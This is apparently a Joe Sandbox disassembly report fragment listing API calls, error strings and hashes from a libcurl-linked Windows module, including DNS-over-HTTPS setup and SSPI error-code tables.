                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6B778141
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3016261861-0
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+$<$GMT
                                                                                                                                            • API String ID: 0-3646017816
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6B7CF0D9
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6B7CF0E3
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B7CF0F0
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,6B7CC43D,?,00000000,?,?,?,6B7C84AA), ref: 6B7CC460
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,6B7CC43D,?,00000000,?,?,?,6B7C84AA), ref: 6B7CC467
                                                                                                                                            • ExitProcess.KERNEL32 ref: 6B7CC479
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%lx,00000000,?,?), ref: 6B7912F9
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_msnprintf
                                                                                                                                            • String ID: %lx
                                                                                                                                            • API String ID: 1809024409-1448181948
                                                                                                                                            • Opcode ID: 94f6991b8264f5dd825f12104431da24e7e699780e03d8362312f20764436fab
                                                                                                                                            • Instruction ID: b22521d634a9d44190587d08f803497c85ed521bd5ee69259e41fd37bf9df127
                                                                                                                                            • Opcode Fuzzy Hash: 94f6991b8264f5dd825f12104431da24e7e699780e03d8362312f20764436fab
                                                                                                                                            • Instruction Fuzzy Hash: 4D712A31F002659BCB10EE7CE6802ADB7B5EF86324F1543B9E469DBAC4E7385659C780
                                                                                                                                            APIs
                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 6B7CBF1D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                            • Opcode ID: 97093f4cf184391879ef45e48a10c5676de72db23d3a241b0720890b777082a0
                                                                                                                                            • Instruction ID: 210334d69cc3101cdb9b6a0226f713ebd439797b0f87f3d1dbea27e4ec2452a9
                                                                                                                                            • Opcode Fuzzy Hash: 97093f4cf184391879ef45e48a10c5676de72db23d3a241b0720890b777082a0
                                                                                                                                            • Instruction Fuzzy Hash: F8B1F3356106088FD715CF28C586B5A7BA0FF45364F2586ACF9A9CF3A1C339E992CB41
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                            • API String ID: 0-595813830
                                                                                                                                            • Opcode ID: 9bc59c534248d75f6359aed3808cf8b20ee6cb0e918afda434db10fd63a69fc3
                                                                                                                                            • Instruction ID: 984e1ae223f74504ed4043a6a6e093f5b32f75fec0599e88868ad07f6dce1dbe
                                                                                                                                            • Opcode Fuzzy Hash: 9bc59c534248d75f6359aed3808cf8b20ee6cb0e918afda434db10fd63a69fc3
                                                                                                                                            • Instruction Fuzzy Hash: 08E02B3368062877C71021D15E04FAE7B14CFA07F2F000272FE285D6808A2E9A53C2F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                                            • Instruction ID: 5626529f64cf01f0962682100c74bc58511cd388f4e6d021444fbffad888c3eb
                                                                                                                                            • Opcode Fuzzy Hash: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                                            • Instruction Fuzzy Hash: 54F0BE2210292007EF12682D60C1AF3A78BCBE6928AA260B1988C479D2865F740FD6E4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                                            • Instruction ID: e1587df0086511f4825879841b979917a642cbf74870ab068f18b7ce7ca0dd23
                                                                                                                                            • Opcode Fuzzy Hash: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                                            • Instruction Fuzzy Hash: E9E08C72911238EBCB10CB99CA48A9AF3FCEB44B40B5144EBF515D3540E274DE00C7D0
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(6B7A8609,00000000,6B7A7A04), ref: 6B7A9A9F
                                                                                                                                            Strings
                                                                                                                                            • SEC_E_CANNOT_INSTALL, xrefs: 6B7A9B22
                                                                                                                                            • SEC_I_SIGNATURE_NEEDED, xrefs: 6B7A9E6F
                                                                                                                                            • SEC_I_COMPLETE_NEEDED, xrefs: 6B7A9E45
                                                                                                                                            • SEC_E_NO_PA_DATA, xrefs: 6B7A9CA8
                                                                                                                                            • SEC_E_NO_IMPERSONATION, xrefs: 6B7A9C8A
                                                                                                                                            • SEC_E_UNTRUSTED_ROOT, xrefs: 6B7A9D98
                                                                                                                                            • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6B7A9DA2
                                                                                                                                            • SEC_E_SECURITY_QOS_FAILED, xrefs: 6B7A9D16
                                                                                                                                            • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6B7A9C58
                                                                                                                                            • SEC_E_BUFFER_TOO_SMALL, xrefs: 6B7A9B18
                                                                                                                                            • SEC_E_DELEGATION_POLICY, xrefs: 6B7A9B7C
                                                                                                                                            • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6B7A9C76
                                                                                                                                            • SEC_I_CONTEXT_EXPIRED, xrefs: 6B7A9E4C
                                                                                                                                            • SEC_E_INTERNAL_ERROR, xrefs: 6B7A9BCC
                                                                                                                                            • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6B7A9CDA
                                                                                                                                            • SEC_E_OUT_OF_SEQUENCE, xrefs: 6B7A9CC6
                                                                                                                                            • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6B7A9BAE
                                                                                                                                            • SEC_E_CERT_UNKNOWN, xrefs: 6B7A9B40
                                                                                                                                            • Unknown error, xrefs: 6B7A9E76
                                                                                                                                            • SEC_E_DECRYPT_FAILURE, xrefs: 6B7A9B72
                                                                                                                                            • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6B7A9E53
                                                                                                                                            • SEC_E_KDC_INVALID_REQUEST, xrefs: 6B7A9C1C
                                                                                                                                            • CRYPT_E_REVOKED, xrefs: 6B7A9DB6
                                                                                                                                            • %s - %s, xrefs: 6B7A9DF5
                                                                                                                                            • SEC_E_NOT_OWNER, xrefs: 6B7A9C6C
                                                                                                                                            • SEC_I_RENEGOTIATE, xrefs: 6B7A9E68
                                                                                                                                            • SEC_E_CERT_EXPIRED, xrefs: 6B7A9B36
                                                                                                                                            • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6B7A9E3E
                                                                                                                                            • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6B7A9D70
                                                                                                                                            • SEC_E_KDC_CERT_EXPIRED, xrefs: 6B7A9C08
                                                                                                                                            • SEC_E_DELEGATION_REQUIRED, xrefs: 6B7A9B86
                                                                                                                                            • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6B7A9D66
                                                                                                                                            • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6B7A9D34
                                                                                                                                            • SEC_E_WRONG_PRINCIPAL, xrefs: 6B7A9DAC
                                                                                                                                            • SEC_E_ALGORITHM_MISMATCH, xrefs: 6B7A9AFA
                                                                                                                                            • SEC_I_CONTINUE_NEEDED, xrefs: 6B7A9DBC, 6B7A9E1E
                                                                                                                                            • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6B7A9D7A
                                                                                                                                            • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6B7A9CD0
                                                                                                                                            • SEC_E_CONTEXT_EXPIRED, xrefs: 6B7A9B54
                                                                                                                                            • SEC_E_POLICY_NLTM_ONLY, xrefs: 6B7A9CE4
                                                                                                                                            • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6B7A9CF8
                                                                                                                                            • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6B7A9C26
                                                                                                                                            • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6B7A9C30
                                                                                                                                            • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6B7A9D48
                                                                                                                                            • SEC_E_ENCRYPT_FAILURE, xrefs: 6B7A9B9A
                                                                                                                                            • SEC_E_TIME_SKEW, xrefs: 6B7A9D5C
                                                                                                                                            • SEC_E_KDC_CERT_REVOKED, xrefs: 6B7A9C12
                                                                                                                                            • SEC_E_CERT_WRONG_USAGE, xrefs: 6B7A9B4A
                                                                                                                                            • SEC_E_NO_CREDENTIALS, xrefs: 6B7A9C80
                                                                                                                                            • SEC_E_SECPKG_NOT_FOUND, xrefs: 6B7A9D0C
                                                                                                                                            • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6B7A9D84
                                                                                                                                            • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6B7A9BB8
                                                                                                                                            • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6B7A9CEE
                                                                                                                                            • SEC_E_BAD_PKGID, xrefs: 6B7A9B0E
                                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6B7A9BFE
                                                                                                                                            • SEC_E_BAD_BINDINGS, xrefs: 6B7A9B04
                                                                                                                                            • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6B7A9D3E
                                                                                                                                            • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6B7A9C44
                                                                                                                                            • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6B7A9B5E
                                                                                                                                            • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6B7A9D2A
                                                                                                                                            • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6B7A9D02
                                                                                                                                            • %s (0x%08X), xrefs: 6B7A9DBD
                                                                                                                                            • SEC_E_NO_KERB_KEY, xrefs: 6B7A9C9E
                                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6B7A9BF4
                                                                                                                                            • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6B7A9CB2
                                                                                                                                            • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6B7A9D20
                                                                                                                                            • SEC_I_LOCAL_LOGON, xrefs: 6B7A9E5A
                                                                                                                                            • SEC_E_MESSAGE_ALTERED, xrefs: 6B7A9C4E
                                                                                                                                            • SEC_E_INVALID_PARAMETER, xrefs: 6B7A9BE0
                                                                                                                                            • SEC_E_CANNOT_PACK, xrefs: 6B7A9B2C
                                                                                                                                            • SEC_E_MUST_BE_KDC, xrefs: 6B7A9C62
                                                                                                                                            • SEC_I_NO_LSA_CONTEXT, xrefs: 6B7A9E61
                                                                                                                                            • SEC_E_INVALID_TOKEN, xrefs: 6B7A9BEA
                                                                                                                                            • SEC_E_INVALID_HANDLE, xrefs: 6B7A9BD6
                                                                                                                                            • SEC_E_LOGON_DENIED, xrefs: 6B7A9C3A
                                                                                                                                            • SEC_E_DOWNGRADE_DETECTED, xrefs: 6B7A9B90
                                                                                                                                            • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6B7A9BC2
                                                                                                                                            • SEC_E_TARGET_UNKNOWN, xrefs: 6B7A9D52
                                                                                                                                            • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6B7A9E88
                                                                                                                                            • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6B7A9D8E
                                                                                                                                            • SEC_E_NO_IP_ADDRESSES, xrefs: 6B7A9C94
                                                                                                                                            • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6B7A9B68
                                                                                                                                            • SEC_E_ILLEGAL_MESSAGE, xrefs: 6B7A9BA4
                                                                                                                                            • SEC_E_NO_TGT_REPLY, xrefs: 6B7A9CBC
                                                                                                                                            • No error, xrefs: 6B7A9E17
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                                            • API String ID: 1452528299-1081713384
                                                                                                                                            • Opcode ID: a1c0f06090376b70398dc2d35c350eb24a320076a611897e7808c4d67fb3bd35
                                                                                                                                            • Instruction ID: c635018889f959a71826c450eae27e8457c765f40a9e048a6e16aa5ff32b4265
                                                                                                                                            • Opcode Fuzzy Hash: a1c0f06090376b70398dc2d35c350eb24a320076a611897e7808c4d67fb3bd35
                                                                                                                                            • Instruction Fuzzy Hash: 6491F32268C915DFC6B2855C478496572966F22BC0B094BB6F5038F23BC62ECD671B73
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strncpy
                                                                                                                                            • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                            • API String ID: 2961919466-3442644082
                                                                                                                                            • Opcode ID: afd69d5bb9d34364cc6bc7601e29bf054e434875c87fb88bb1abd9203d7fd474
                                                                                                                                            • Instruction ID: e890ef0616209d629e820664245bb48bcbc03709840955b288fc2d3dd9b85ddb
                                                                                                                                            • Opcode Fuzzy Hash: afd69d5bb9d34364cc6bc7601e29bf054e434875c87fb88bb1abd9203d7fd474
                                                                                                                                            • Instruction Fuzzy Hash: FC414429B8C14A8B86BC081C4B01557B2E66F52A90780DFBAB80CDE250FD5EC9434376
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B79E683
                                                                                                                                            • curl_maprintf.LIBCURL(%s?dns=%s,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 6B79E753
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002712,00000000,?,?,?,?,00000000,?,?,?), ref: 6B79E806
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E2B,6B79E5E0,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6B79E825
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002711,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6B79E849
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000271F,?), ref: 6B79E86F
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000003C,?), ref: 6B79E88C
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002727,?), ref: 6B79E8A9
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000B5,00000002), ref: 6B79E8C5
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000009B,?), ref: 6B79E8E2
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000029,00000001), ref: 6B79E903
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000063,00000001), ref: 6B79E925
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E9,00000001), ref: 6B79E94A
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000051,00000002), ref: 6B79E96C
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F9,00000002), ref: 6B79E991
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F8,00000001), ref: 6B79E9B6
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002806,?), ref: 6B79E9DB
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002814,?), ref: 6B79EA00
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000105,00000008), ref: 6B79EA32
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002807,?), ref: 6B79EA57
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000040,00000001), ref: 6B79EA79
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E8,00000001), ref: 6B79EA9E
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002751,?), ref: 6B79EAC3
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002771,?), ref: 6B79EAE8
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000027B9,?), ref: 6B79EB0D
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000AC,00000001), ref: 6B79EB32
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275C,?), ref: 6B79EB57
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275D,?), ref: 6B79EB7C
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000D8,00000008), ref: 6B79EBAE
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E8C,?), ref: 6B79EBD3
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000277D,?), ref: 6B79EBF8
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000283A,?), ref: 6B79EC1D
                                                                                                                                            • curl_multi_add_handle.LIBCURL(?,00000000), ref: 6B79EC4E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_easy_setopt$___from_strstr_to_strchrcurl_maprintfcurl_multi_add_handle
                                                                                                                                            • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                                            • API String ID: 667061265-3030351490
                                                                                                                                            • Opcode ID: 4879e00ec6e24816643d9dfe39390f424b78f45ba76bed44e36a905fb2adb783
                                                                                                                                            • Instruction ID: 6fb9469e1b9e6ac786b1b1ac8b1b0a3454feb59be1248bfeeed928bde1b4479b
                                                                                                                                            • Opcode Fuzzy Hash: 4879e00ec6e24816643d9dfe39390f424b78f45ba76bed44e36a905fb2adb783
                                                                                                                                            • Instruction Fuzzy Hash: C9F10A71D44219BBEB229A60BF46B9EB7A5BF00750F0502B0FC54BB291D76E8E58C7C1
                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%5I64d,?,?,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D02A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D053
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dk,00000000,?,?,?,00000400,00000000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D065
                                                                                                                                            • __allrem.LIBCMT ref: 6B79D08A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D098
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D0A8
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dM,00000000,?,?,?,00100000,00000000,00000000,?,00000000,?,00019999,00000000,?), ref: 6B79D0BA
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D0E0
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dM,00000000,?,?,?,00100000,00000000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D0F2
